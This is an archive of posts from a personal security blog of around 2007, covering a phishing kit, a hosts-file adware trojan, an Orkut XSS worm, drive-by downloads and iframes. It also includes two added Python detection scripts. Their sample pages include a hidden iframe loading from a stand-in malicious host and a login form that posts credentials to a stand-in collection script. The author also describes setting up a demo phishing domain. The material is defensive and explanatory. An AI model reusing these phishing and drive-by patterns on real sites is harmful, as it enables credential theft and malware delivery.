Bittu’s back :)

Bittu, my wife, got revamped. For unemotional people, it simply means I bought a new laptop 🙂

She is red, and she’s hot!


She’s a Dell XPS M1330. Other features include:

1. Intel Core 2 Duo, 2.1 GHz (my first Intel; I used to be with AMD)
2. 200GB HD, 7200rpm
3. 128 MB Nvidia graphics card (the games run awesomely, and I have re-entered the gaming arena. Currently re-re-replaying Serious Sam: The Second Encounter)
4. Pre-loaded Vista 🙁 (I am still a little confused whether to go ahead with OpenSuse 10.3 or wait 6 more days for OpenSuse 11 to arrive. 😉 )
5. and other regular features like a DVD writer, fingerprint scanner, built-in webcam, etc. etc. etc.

I should have posted about her by now, but I have been very, very busy with official work involving OpenSocial until yesterday. Hoping to publish the other draftified articles soon.

Slashdot, uh! :|

Slashdot is supposed to be a respectable (news) portal for geeks and nerds. Its tagline says “News for nerds, stuff that matters”. I must admit that there was a time when I used to start my day with Slashdot, trying not to miss a single story. That phase, however, is over. The two biggest problems with Slashdot today are:

1. The Slashdot community, which is being reduced to people who lurk around to post jokey and sarcastic comments. It’s very seldom that you come across an intelligent and insightful comment.
2. The news itself, if I may say so.


This rant is a direct result of a story titled Google Assists In Arrest Of Indian Man, posted on the 19th. First of all, this is old news. In fact, I’d used the context to post a legal analysis of the impact of another Orkut worm, to the best of my knowledge and belief. I have nothing against reading old news, but for God’s sake, don’t claim it to be new.

Secondly, the post cites Shivaji as a saint. He was not a saint. He was a king and a warrior. Do your homework before posting, or rather approving such news.

Thirdly, the tone in which the post is written is as vague as, if not vaguer than, the point the post tries to make. If you wish to blame Google, get proper info before doing that. Google has a pact with Indian law enforcement; they are bound to provide such info. If you wish to convey that the wrong person was convicted, say it. If you wish to bring up the role of Yahoo! and Google in such cases, do it properly.

All that being said, I don’t think I’ll completely stop reading /. . However, the prestige of being Slashdotted now seems to be just about traffic.

A new home for us :)


People who know me know that I avoid social networking portals. Don’t worry, this post isn’t another rant. It’s more of an announcement that I’ve joined a social network 🙂

Yup! The guys at GNUCitizen have started a social network for hackers, and very intelligently named it House of Hackers. I’d like to call it HoH (as in Hah!) 🙂

House of Hackers

A few motives cited for creation of the network are:

  • To provide a platform for hackers to exchange ideas, communicate, and/or even form groups, elite or otherwise. Although Slackers is an amazing place to communicate, the web is never big enough for two similar houses. Moreover, they aren’t the same, just similar.
  • To create a hacker recruitment market. Recruiters could advertise here to recruit/hire people. The best part of this, as cited, would be that HoH would eliminate any middleman (or your employer), and hence help you earn more. Pretty obviously, this holds meaning for the elite ones only. But then I have always believed that you can learn only to the extent you can challenge yourself… and good company definitely challenges you 🙂
  • To fund research programs from time to time. Not so long ago, Ronald came up with the idea of the Router Hacking Challenge, where you had to hack your own router and make the findings public. The _cutest_ hack would be regarded as the best. GNUCitizen (Ronald is now a part of GNUCitizen) hosted the contest. I mention this just to affirm that I really like the guys at GNUCitizen, and I am really excited to know that they’d be encouraging the community (and funding them too). The money is expected to come from the recruitment advertisements.

Needless to say, I am keeping my eyes open and my fingers crossed, hoping that this turns out to be a great venture for the community.

Just one concern: these %*^*@#$ hackers will keep screwing with the networking portal, you know. 😉

My profile link.


I have a special liking for T-shirts with quotes. The geekier the quote, the geekier… I mean, the better.
I got this T-shirt made for myself a couple of days ago.
In case you didn’t get it, it’s a mockery of the crippled iPhone.


Oh by the way, this is my first post on the new blog, and this pic is a response to Swenny’s post on Adding an “i” 🙂

How about a Better & Cheaper MacBook Air!

Those were the days when I used to be an Apple fan.
Aah, the harsh reality: they produce nothing more than crippled products at sky-high prices.

Moreover, Apple isn’t just about cut-throat business. It’s also about making people feel bad about themselves.
Don’t trust me?
See here yourself.

A Phish floating in Google Survey!


1. Phizy-Phizy-Phizy

I have always loved making this phizy-phizy-phizy sound purposelessly, which I once heard in a Rob Schneider movie (which, if I remember correctly, was a pathetic movie). Anyhoo! I now have a set of very strong reasons to move around repeating the same lines.
First, we received a request to be involved in a discussion of a risk assessment model for a banking site. This model had to be focussed on two-factor authentication and phishing. This brainstorming gave me a couple of interesting avenues to work on. Hopefully, I’ll be writing more on this pretty soon.
Secondly, Peter Thomas (one of my amazing bosses) forwarded me the link to the latest research by Nitesh Dhanjani & Billy Rios. They virtually infiltrated the phishers’ ecosystem and have come up with some very interesting information.
Thirdly, my friend Swen called me up to let me know about a phishing mail, claiming to be a Google survey, that had landed in his mailbox. He was excited for two reasons:
a) He had received a phishing mail for the first time, and I guess you all remember the excitement of discovering your first phishing mail.
b) He is one of the Google fans, and is worried about the safety of the vast user base Google has. Obviously, his concern isn’t without reason.

2. A Phish named GoogleSurvey

As I mentioned, Swen informed me about the shiny phish called GoogleSurvey. It presents you with a page that looks exactly like the Google login page and asks you to log in in order to complete the survey. If you log in, you are presented with 3 questions, one by one. At the end you are thanked for completing the survey.

3. Anatomy of Google-Survey-Phish gills

The Google Survey phish isn’t sophisticated by ANY standards. Clearly, it’s done by some n00b, and was probably deployed using a very cheap phishing kit. However, it’s really interesting to understand how it works.
The first page you encounter while analyzing it, I must admit, looks very similar to the Google Mail login page. A look at the source code reveals that this is not the original page. The Google Mail look-alike page is actually hosted elsewhere; the page you land on only frames it, at 100% width and with a 0px border, so the browser shows the look-alike while the address bar shows the landing page.

Another interesting point to note is that the phisher used a free hosting service. Thus, theoretically, he/she cannot be traced. Not via the hosting service, at least. 🙂

Now, when you enter your ID and password, the data is sent to a PHP script on a server located elsewhere. Quite obviously, this script stores/mails your credentials to someone who’s not a very pleasant person.

4. Demo: Farming your own Phishes for fun & profit *cough*

The world of phishing is so dark, deep, safe, easy, and seductive that a person with even a slight malicious streak would be tempted to farm his/her own phishes and make easy money. I set up my phishing domain for educational purposes. It also shows how quickly you can set up your very own phishing portal, sometimes even without a phishing kit. The domain I’ve set up has the following deliberate flaws (introduced to prevent me getting screwed by some half-witted law enforcer):
1. The domain points at Yahoo!, while the page displayed is similar to the GMail login page.
2. The information entered is NOT stored. You can check it by entering garbage data.

I have used the same page used by the GoogleSurvey Phish, and also used the same free hosting service.

5. Conclusion

It’s almost impossible to prevent users from getting phished. People will continue to click on links they receive in their inbox and <sarcasm> proceed to win an iPod </sarcasm>. Reducing phishing requires a number of things to be in place: sensible developers, well-informed end users, smart browsers with phishing-aware features (IE7, Fx2 etc.), a few toolbars like Netcraft’s installed, etc. etc. And even doing all this doesn’t guarantee to save a user ignorant of phishing. I mean, how do you save a person who doesn’t even know that such a kind of fraud exists?
Moreover, the URI vulnerabilities have added another dimension to the whole phishing scene. 🙂

Proposal for a new Array Syntax in PHP

A new array syntax has been proposed (for quite some time now) for defining arrays in PHP. Currently, we use the array() construct to create an array. Some examples could be (an element without a key gets the next free integer key, so "three" ends up at index 3):

$myArray = array(1, 2, 3, 4, 5);
$yourArray = array(1 => "one", 2 => "two", "three");
$herArray = array(1, 2, 3, array(4 => "four", "five"));

The proposal is to use square brackets ( [ ] ) to define an array. If passed, we would be able to rewrite the above examples as:

$myArray = [1, 2, 3, 4, 5];
$yourArray = [1 => "one", 2 => "two", "three"];
$herArray = [1, 2, 3, [4 => "four", "five"]];

There’s a good deal of discussion going on on the internals mailing list, with almost equal numbers of people voting “for” and “against” it. Rasmus isn’t very supportive, yet has voted for the new proposal.

To be pretty honest, I am still not very sure if it’s going to be worth the trade-offs.
Anyhoo! Let’s wait and watch. 🙂

Yahoo!’s javascript based media player!

Yahoo! launched its browser-based media player written in JavaScript. All you have to do is include the JavaScript file in a web page that has links to audio file(s).

Although it takes a while for the “player” to load completely, I am pretty okay with it (for now). Moreover, it’s in beta. I, however, sincerely hope that it doesn’t follow the GMail beta path. urghh!

Check back in a few hours; I’ll be posting a demo of the player on my portal. Update: A demo is here. This demo has a special meaning for Indians of my age (or older) because the songs I’ve used are the ones we all grew up with, viz. Jungle Book, Mile Sur Mera Tumhara, Baje Sargam, Byomkesh Bakshi, Malgudi Days, Surabhi, Tipu Sultan & Mahabharat. 🙂

Special thanks to Madhav for sharing them.

What a new year Gift! :)

It brings me immense pleasure to inform you that w3af (web application attack and audit framework) has been named the Best Application Scanner in the “Best IT Security and Auditing Software 2007” list prepared by Security Database. 🙂

I had mentioned in a few previous articles that I see immense potential in w3af. I must, however, also admit that I wasn’t expecting something like this to happen so quickly. I am glad I was wrong 🙂

Hoping that more people contribute to the project, and wishing that I get some time to write at least a few w3af-dedicated posts (preferably targeted at developers).

Have a great year ahead.

AdSense exploited by malware (Trojan.Qhost.WU)

1. Life & Code


(The title of this section is taken from Johnny’s blog of the same name, Life and Code. Although my use of the phrase isn’t in line with Johnny’s, I couldn’t resist using it. 🙂 )

Life: Three days ago I found some strange entries in my local Apache web server logs. Something like:
- - [18/Dec/2007:19:39:26 +0530] "GET /iview/msnnkhac001160x600Xdig1600000185msn/direct;wi.160;hi.600/01 HTTP/1.1" 404 352
- - [18/Dec/2007:19:42:19 +0530] "GET /pagead/show_ads.js HTTP/1.1" 404 320

Code: Bitdefender reports a piece of malware, named Trojan.Qhost.WU, that redirects all the requests the victim’s browser makes to Google’s ad server to a rogue ad server.

2. Impact of the issue:

Reportedly, a big part of Google’s earnings comes from its ad services. Thus this trojan is depriving not only Google of its earnings, but also the publishers who work hard and hope to make a quick buck for their evening coffee.

3. The enigmatic “hosts” file:

You all know that every system connected directly to the internet is assigned a unique IP address. A domain name is nothing but a unique name assigned to an IP address (more than one domain name can be mapped to the same IP address, but that is not our concern right now). This mapping is stored in DNS servers. Each time the browser tries to open a site, a nearby DNS server is queried to find the IP address.
However, before all this, the “DNS server” of your local system, the hosts file, is consulted (don’t get me wrong, this DNS server is just a metaphor 🙂 ). The hosts file stores domain-name-to-IP-address mappings for names that don’t need a DNS query, e.g. localhost is mapped to 127.0.0.1, the loopback IP, i.e. the IP of the local system. Whatever the hosts file says wins; DNS is only asked about names that aren’t in it.
On Windows 2000/NT and later it’s located at %systemroot%\system32\drivers\etc\hosts, and on *nix systems at /etc/hosts. More info on locations can be found here.

Now coming back to my problem; unable to find any satisfactory answer, I posted it on Slackers. Giorgio Maone, better known as the author of the awesome NoScript plugin for Fx, immediately responded and asked me to check my hosts file.
I had added a number of entries for ad-serving sites to my hosts file, pointing them at the local IP, and forgotten about it. I did this to prevent ads from being loaded. Hence, each time any of these sites was called, the hosts file redirected the request to my local server.
So pretty obviously, I was/am not infected.
“Why do you post the junk about your issue then?”, you ask.
“Because it was a strange coincidence, and because I can, honey :P”

4. How the exploit works?

It’s fairly simple: the malware modifies your hosts file and adds an entry for the ad server’s hostname. Since the hosts file is consulted before DNS, no lookup happens and every request for that name goes straight to the malicious server.

5. How do I protect myself?

1. Locate your hosts file and remove any entry for the ad server’s hostname. Alternatively, you can modify the entry to point to your local IP (127.0.0.1), in case you don’t wish to see those ads.
2. Let your Antivirus/AntiSpyware do it for you.
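As an added check that is not part of the post (nor Bitdefender’s advice), here is a small audit of a hosts file in Python that separates the harmless ad-blocking entries described above (names pointed at 127.0.0.1) from the Trojan.Qhost.WU pattern (a name pointed at a routable address). The sample hosts file, its hostnames and the 203.0.113.7 address are all constructed; the Windows path assumes %systemroot% is C:\Windows. Run it with no arguments to audit the sample, or pass the path of a real hosts file.

```python
import ipaddress
import sys

# Locations named in the post; the Windows one assumes %systemroot% is C:\Windows.
HOSTS_PATH = (r"C:\Windows\System32\drivers\etc\hosts"
              if sys.platform.startswith("win") else "/etc/hosts")

# Constructed sample (hostnames and the 203.0.113.7 address are invented).
# The two 127.0.0.1 "ad" entries are the ad-blocking trick from the post;
# the last line is what a Qhost-style edit looks like.
SAMPLE_HOSTS = """\
127.0.0.1       localhost
::1             localhost ip6-localhost ip6-loopback
# my ad blocking: requests for these names end up on my own box
127.0.0.1       ads.example.net   pagead.example.net
# planted by malware: the ad host now resolves to a remote server
203.0.113.7     pagead.example.net   # hypothetical rogue ad server
"""


def parse_hosts(text):
    """Yield (line_no, ip, hostname) for every mapping, skipping comments and junk."""
    for n, raw in enumerate(text.splitlines(), 1):
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        fields = line.split()
        try:
            ip = ipaddress.ip_address(fields[0])
        except ValueError:
            continue  # not an "<ip> <host>..." line
        for host in fields[1:]:
            yield n, ip, host.lower()


def audit_hosts(text):
    """Return [(line_no, hostname, ip, verdict)].

    'sink'     - name points at loopback/0.0.0.0: the ad-blocking trick, harmless.
    'redirect' - name points at a routable (public or LAN) address: every request
                 for it is silently sent to that server, which is what Qhost does.
    Link-local, multicast and reserved addresses (ip6-allnodes etc.) are normal
    system entries and are ignored.
    """
    findings = []
    for n, ip, host in parse_hosts(text):
        if ip.is_loopback or ip.is_unspecified:
            findings.append((n, host, str(ip), "sink"))
        elif ip.is_multicast or ip.is_link_local or ip.is_reserved:
            continue
        else:
            findings.append((n, host, str(ip), "redirect"))
    return findings


def redirected_hosts(text):
    """Names whose traffic has been pointed at a real server: the Qhost indicator."""
    return sorted({h for _, h, _, v in audit_hosts(text) if v == "redirect"})


def conflicting_hosts(text):
    """Names that are both sunk and redirected. Most resolvers take the first
    matching line, so which entry wins depends on where the malware inserted its line."""
    verdicts = {}
    for _, host, _, v in audit_hosts(text):
        verdicts.setdefault(host, set()).add(v)
    return sorted(h for h, vs in verdicts.items() if {"sink", "redirect"} <= vs)


if __name__ == "__main__":
    if len(sys.argv) > 1:
        with open(sys.argv[1], encoding="utf-8", errors="replace") as f:
            text = f.read()
    else:
        text = SAMPLE_HOSTS
    for n, host, ip, verdict in audit_hosts(text):
        print(f"line {n:>3}: {host:<22} -> {ip:<15} {verdict}")
    if redirected_hosts(text):
        print("REDIRECTED:", ", ".join(redirected_hosts(text)))
    if conflicting_hosts(text):
        print("CONFLICTING:", ", ".join(conflicting_hosts(text)))
```

A name in the redirect list is the symptom to look for: a hostname that has no business being in the file at all is being handed to someone else’s server. Because the hosts file is consulted before DNS, flushing the DNS cache does nothing until the line itself is gone.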

6. Conclusion

What! Dump M$ Windows for Linux. 😛
Seriously, “Linux ain’t easy to use” is a myth. Moreover, if you are into flashy looks, try the compiz-beryl package. It IS awesome… (and consumes far fewer resources than… uh, Vista.)

7. Bonus Tip

In case you wish to prevent your kids, partner (or even parents) from visiting some sites, or don’t want those crappy ads loaded, you might consider editing your hosts file. For more information, or even sample hosts files, use Yahoo! search.

Orkut Latest XSS Worm; and what it means for Indian Orkuteers

Update: Kishor reports a flaw in the implementation of the “private videos” feature on Orkut. Although I am at the office and haven’t checked it yet myself, I believe I can trust him, based on his posts at Slackers. Nice one, Kishor. 🙂

1. YAWN [Yet Another Worm, Nanny]

Orkut (Google’s answer to MySpace and Facebook, huge in India, Pakistan and Brazil) has been hit by an XSS worm. It’s useless to say, but I am not able to resist, so I’ll say it anyway: it’s not the first time that a social networking site has been attacked by an XSS worm. In fact, these sites are the primary target for a number of reasons: a more gullible audience, exponential reach, huge amounts of data waiting to be harvested, web 2.0, etc. etc. etc. There’s a good compilation of XSS worms (social network worms or not) being maintained at Slackers.
Anyhoo. This incident has already been reported by a number of bloggers, so I won’t dive into the technical details. However, this worm seems to have been harmless, and is fixed for now.

2. What it did?

If you viewed a message reading 2008 vem ai… que ele comece mto bem para vc (Portuguese: “2008 is coming… may it start really well for you”) in your scrapbook, there is a big probability that you’re infected. You were added to a community named Infectados pelo Vírus do Orkut (“Infected by the Orkut Virus”). The worm then forwards itself to the scrapbooks of all your contacts (on your behalf). Any doubts about it being exponential?

3. IT Act 2000 [pdf]

IT Act 2000 is India’s legal answer to miscreants on the technological front. (I realize it’s a pathetic definition, so no flames on it please 🙂 ). The trouble with IT Act 2000 is that the majority of law enforcers aren’t really aware of real-life scenarios. I’ll give a real case to support the point in a while. Although I am no law expert (just a little bit of interest), I guess I can safely say that the Act needs a few amendments to include/modify a number of issues (e.g., spam, etc.)

So what happens when the implementation is in a nascent stage, and the enforcers are not completely educated?
Things get blown out of proportion. Things get painted in a completely new color. Things get… uh! Fill them in yourself.

Chapter 11 of the Act defines the Offences – section 65 to section 78. For now, let’s have a look at Sections 65, and 67.
Section 65: Tampering with computer source documents.

Whoever knowingly or intentionally conceals, destroys or alters or intentionally or knowingly causes another to conceal, destroy or alter any computer source code used for a computer, computer programme, computer system or computer network, when the computer source code is required to be kept or maintained by law for the time being in force, shall be punishable with imprisonment up to three years, or with fine which may extend up to two lakh rupees, or with both.
Explanation: For the purposes of this section, “computer source code” means the listing of programmes, computer commands, design and layout and programme analysis of computer resource in any form.

Section 67:Publishing of information which is obscene in electronic form.

Whoever publishes or transmits or causes to be published in the electronic form, any material which is lascivious or appeals to the prurient interest or if its effect is such as to tend to deprave and corrupt persons who are likely, having regard to all relevant circumstances, to read, see or hear the matter contained or embodied in it, shall be punished on first conviction with imprisonment of either description for a term which may extend to five years and with fine which may extend to one lakh rupees and in the event of a second or subsequent conviction with imprisonment of either description for a term which may extend to ten years and also with fine which may extend to two lakh rupees.

I have mostly been interested in section 67 (which, according to some in the law industry, also extends to SMS services 🙂 ).

Anyhoo. If you are interested in punishments, here’s the link. Have a look. You might be serving one someday 😉

5. Case Study

There have been quite a few cases revolving around Orkut, but the one that I’ll be talking about (and the most relevant one) is the one where the wrong man (Lakshmana Kailash K) was put behind bars for 50 freakin’ days. He was “reportedly” involved in the defamation of Chhatrapati Shivaji, a highly revered historical figure.
In case you aren’t aware, Orkut (Google) has signed a pact with Indian Law Enforcement. They pledge to “block any ‘defamatory or inflammatory content’, or hand over IP address information to police if asked”.

So what happened in the above case?
Law enforcers receive a complaint about the defamation of Shivaji, they contact Orkut, Orkut gives them an IP address, law enforcers run to the ISP (Airtel in this case), Airtel provides an address, and the guy is put in jail.
Simple. Isn’t it?

The only trouble being that Airtel provided the wrong address.
Whoops! And bang! The dude spends 50 days straight, for something he didn’t do.
Neha Viswanathan, a blogger based in the UK, has a very nice write-up on the incident. Further, there’s a very nice compilation of some cyber crime cases in India at the IndiaCyberLab portal.

6. Putting the pieces of puzzle together

Let’s first collect all the pieces together:
1. Orkut has a pact with Indian law enforcement.
2. Law enforcers are incompetent *cough*.
3. Orkut (or any other similar site) still has XSS and CSRF flaws. Period.
4. XSS and CSRF let you (among a thousand other things) manipulate source code (section 65) and/or insert obscene/derogatory content (section 67).
5. XSS and CSRF let you post/manipulate data on some other person’s behalf. (The Orkut/Samy etc. worms did not require you to click anywhere. Just load the page and the payload is inserted in your friends’ scrapbooks on your behalf.)

Now combine them all, and you’ll realize that there might be a day when you just sent a “long time no scraps” scrap to your friend’s scrapbook and went to bed. The next day, a bunch of cyber-crime officers wake you up and arrest you for defaming Bala Saheb Thakrey.

…and yes! Don’t talk about democracy. You’ve already seen that the politicians can get away with a wrestling match in the parliament arena that would put WWE stars to shame. On the contrary, a chap is detained for 50 days just because the cops thought they had enough evidence.

7. Conclusion

Stay away from social networking sites. Trust me, they are not worth the price.

Drive-by Download: Where Network Security Meets WebAppSec


This post has been due since the Bank of India hack, and was prompted by PDP’s Drive-by Java post, which is a very simple, yet well-thought-out, extension (sort of) of the Drive-by Download attack. This post aims to provide a clearer understanding of the Drive-by Download attack (via a demo).

Citing Wikipedia, any download that happens without the knowledge of the user can be referred to as a Drive-by Download (DBD). Pretty obviously, the attacker downloads (or uploads, depending on the perspective) malware, viruses etc. onto the victim’s machine, usually through a flaw in the browser or one of its plugins, especially in the case of a zero-day. Now, I should also specify that by the sub-title “network security meets web application security” I simply wish to point out that viruses, malware and worms are not really a concern of WebAppSec. Please note that this excludes JavaScript payloads.

Here is the video of the Bank of India hack, showing DBD in action.

Here is my demo of DBD in action.
All files downloaded to your system are 0 (zero) KB and are completely harmless. You have my word. 🙂

The Web is Broken

Update: I somehow managed to make a blunder. A part of slide no. 12 was taken from David Kierznowski’s (of the GNUCitizen and BlogSecurity groups) presentation for the OWASP Belgium conference. I missed out on mentioning David’s name in the credits. Apologies, David. I’ve updated and re-uploaded it.

Yesterday, I presented my first webinar (a seminar on the web). It was titled The Web is Broken: Why every feature is, in fact, a loophole. A great experience.

After listening to my own recording, though, I felt that a number of things went wrong (mostly because of connectivity problems and slow internet speed). The issue I was worried about was that it was targeted at developers with beginner to intermediate level knowledge of the web, but the topic was very broad. Fortunately, I received some good feedback along with requests to conduct more such sessions. The talk was scheduled for 1.5 hours, but it stretched to 2.5 hours.

Here is the presentation:

I hope you like it too. 🙂

NoScript: For Guaranteed Protection From Evil IFrames

I know, I know… the title sounds like a cheap promotion ad. 😀

As I mentioned in my previous entry, Giorgio has addressed our (mine and Gareth’s) request to block iframes using NoScript. I must, however, admit that I did not expect it to be this fast. NoScript (SilverNight) is here. The changelog mentions the thread I started at Slackers (and our names).

Please note that the Mozilla add-ons site may not be updated immediately. So, if you are a restless soul like me, get it directly from the NoScript site.

Further, I am currently evaluating some security scanners for my company. I am a little disheartened that there isn’t any amazing scanner available yet. However, I am very hopeful about w3af. I have this strong feeling that it has the potential to be the next “Metasploit Framework for the web”. Expect an entry on w3af (and maybe OWASP’s LAPSE plugin).

IFrames – To be or not to be?

Update: Aah. It’s not that there couldn’t have been any better news :P, but today’s news is that Ma1 has agreed to provide a feature to block frames through NoScript from the next version (1.1.7). NoScript rocks. 🙂
Oh, and yes! Ma1 rocks too… ;)

I have been pretty busy for the last few weeks (and this trend is likely to continue for the coming weeks). Thus, my posts have been more like “news flashes”. Apologies for that. I’ve now decided to blog about the things/technologies I am working on. (Expect some write-ups on security scanners like w3af and code auditing tools like LAPSE.) However, I couldn’t stop myself from putting forward this debate on IFrames. First, let’s see what *evil* things IFrames can do for… *cough*… you

A couple of days ago, the Bank of India site was compromised. It was serving malware to visitors through “drive-by downloads”. The culprits were (invisible) IFRAMEs injected into the site’s pages.
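Three things described on this page can be spotted from the HTML alone: the GoogleSurvey phish above, whose landing page only frames a look-alike login page at 100% width with no border and whose form posts the credentials to a PHP script on another server; the drive-by download post; and the Bank of India compromise just mentioned, done with invisible IFRAMEs. The scanner below is an added example written for this page, not code from the post, from the kit or from any of the researchers named; the four sample pages and every hostname in them are constructed, and the cut-offs (a frame 1px or smaller counts as invisible) are my own choices.

```python
from html.parser import HTMLParser
from urllib.parse import urljoin, urlparse

# Four constructed pages (every hostname is invented; none of this is the real kit's markup).
PHISH_WRAPPER = ("http://free-host.example/~user/survey.html", """
<html><body>
<iframe src="http://lookalike.example/GoogleSurvey/login.html"
        width="100%" height="100%" frameborder="0" style="border:0px"></iframe>
</body></html>""")

PHISH_LOGIN = ("http://lookalike.example/GoogleSurvey/login.html", """
<html><body><h2>Sign in to take the survey</h2>
<form method="post" action="http://drop.example/cgi-bin/collect.php">
  <input name="Email"> <input type="password" name="Passwd"> <input type="submit">
</form></body></html>""")

DRIVE_BY = ("http://bank.example/index.html", """
<html><body><h1>Welcome</h1>
<iframe src="http://evil.example/load.html" width="0" height="0" style="display:none"></iframe>
</body></html>""")

CLEAN = ("http://bank.example/login.html", """
<html><body><form method="post" action="/login"><input type="password" name="p"></form></body></html>""")


class _Collector(HTMLParser):
    """Collect every frame and form, noting whether a form carries a password field."""

    def __init__(self):
        super().__init__()
        self.frames, self.forms, self._form = [], [], None

    def handle_starttag(self, tag, attrs):
        a = {k.lower(): (v or "") for k, v in attrs}
        if tag in ("iframe", "frame"):
            self.frames.append(a)
        elif tag == "form":
            self._form = dict(a, has_password=False)
            self.forms.append(self._form)
        elif tag == "input" and self._form is not None and a.get("type", "").lower() == "password":
            self._form["has_password"] = True

    def handle_endtag(self, tag):
        if tag == "form":
            self._form = None


def _style(a):
    pairs = (p.split(":", 1) for p in a.get("style", "").lower().split(";") if ":" in p)
    return {k.strip(): v.strip() for k, v in pairs}


def _length(a, key):
    """Width/height from the attribute or the style as a number; None for '100%' etc."""
    raw = (a.get(key) or _style(a).get(key, "")).strip().lower()
    if raw.endswith("px"):
        raw = raw[:-2]
    try:
        return float(raw)
    except ValueError:
        return None


def _target_host(page_url, url):
    return (urlparse(urljoin(page_url, url)).hostname or "").lower()


def frame_reasons(a, page_url):
    """Why a frame looks like a phishing wrapper or a drive-by loader ([] if benign)."""
    page_host = _target_host(page_url, "")
    st = _style(a)
    reasons = []
    host = _target_host(page_url, a.get("src", ""))
    if host and host != page_host:
        reasons.append(f"loads content from another origin ({host})")
    w, h = _length(a, "width"), _length(a, "height")
    hidden = st.get("display") == "none" or st.get("visibility") == "hidden"
    if hidden or (w is not None and w <= 1) or (h is not None and h <= 1):
        reasons.append("invisible frame (zero size or display:none)")
    full_width = a.get("width", "").strip() == "100%" or st.get("width") == "100%"
    no_border = (a.get("frameborder", "").strip() == "0"
                 or st.get("border", "").split()[:1] in (["0"], ["0px"], ["none"]))
    if full_width and no_border:
        reasons.append("borderless full-width frame (the page is only a wrapper)")
    return reasons


def scan_page(page_url, html):
    """Return [(element, target, reason)] for frames and forms worth a closer look."""
    page_host = _target_host(page_url, "")
    c = _Collector()
    c.feed(html)
    findings = []
    for a in c.frames:
        for reason in frame_reasons(a, page_url):
            findings.append(("iframe", a.get("src", ""), reason))
    for f in c.forms:
        action = f.get("action", "")
        host = _target_host(page_url, action)
        if f["has_password"] and host and host != page_host:
            findings.append(("form", action, f"password field submitted to another origin ({host})"))
    return findings


if __name__ == "__main__":
    for url, html in (PHISH_WRAPPER, PHISH_LOGIN, DRIVE_BY, CLEAN):
        print(url)
        for element, target, reason in scan_page(url, html) or [("-", "-", "nothing suspicious")]:
            print(f"  {element:<6} {target:<48} {reason}")
```

It flags rather than proves: a legitimate site may frame an off-origin widget or post its login form to a single-sign-on host, so the output is a list of things to look at. And a kit that builds the frame or rewrites the form action with JavaScript will not show up in a static parse at all.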

I hope most of you are aware of how dangerous JavaScript can be. Of course, I am referring to XSS attacks. However, recent research, notably from Jeremiah Grossman, RSnake and Gareth Heyes, showed another shockingly dark side: XSS-like attacks with CSS (yes, Cascading Style Sheets 🙂 ). The culprits here are IFrames, the :visited pseudo-class, etc.

Gareth also gave a proof of concept on his blog of performing CSRF using CSS, even when JavaScript is disabled. He (very cleverly) used CSS to change the look and feel of a submit button into that of a link. Now, when a *smart* user surfing the web with JavaScript disabled sees a link, he doesn’t worry about clicking it, and may end up clicking on the *link* and submitting the form, which the attacker has pointed at another site.

You decide… :).
I have anyway left out some other known issues, I think.

Gareth has been preaching the evil nature of IFrames for quite some time now. Yesterday, he made a new entry titled “IFRAMES ARE EVIL” on his blog. He suggested using some attributes/tags to disable/enable iframes etc. Iframes have been on my mind for quite some time. I believe that Content Restrictions, once introduced, can solve a number of issues. Till then, I believe Maone’s NoScript can come to the rescue by providing an optional feature to disable iframes. I know this is definitely not an attractive suggestion, but who knew we’d have to browse with JavaScript disabled!

Moreover, I thought it’d be a good opportunity to see what other researchers have to say about it. So, I posted it to the Slackers forum. I am watching keenly. 🙂

M$ WindowsXP just got a newer version of Update with new Components!

I am not sure if anyone is aware of it or not, so kindly spare me if it’s not NEW in the sense I wish to convey. (Or maybe you didn’t discover it the way I did) 😛
For no particular reason, I visited the windows update page today (using IE7) and got this message:


As you can see, the *latest version* of Windows Update requires a few components to be installed on your system. There are also some details regarding the components, which are hidden using a JavaScript function.

I’d encourage you to read all the benefits provided by the latest version. Once you are done reading them (and figuring out which of them are new and which make sense), proceed to discover the *special component*.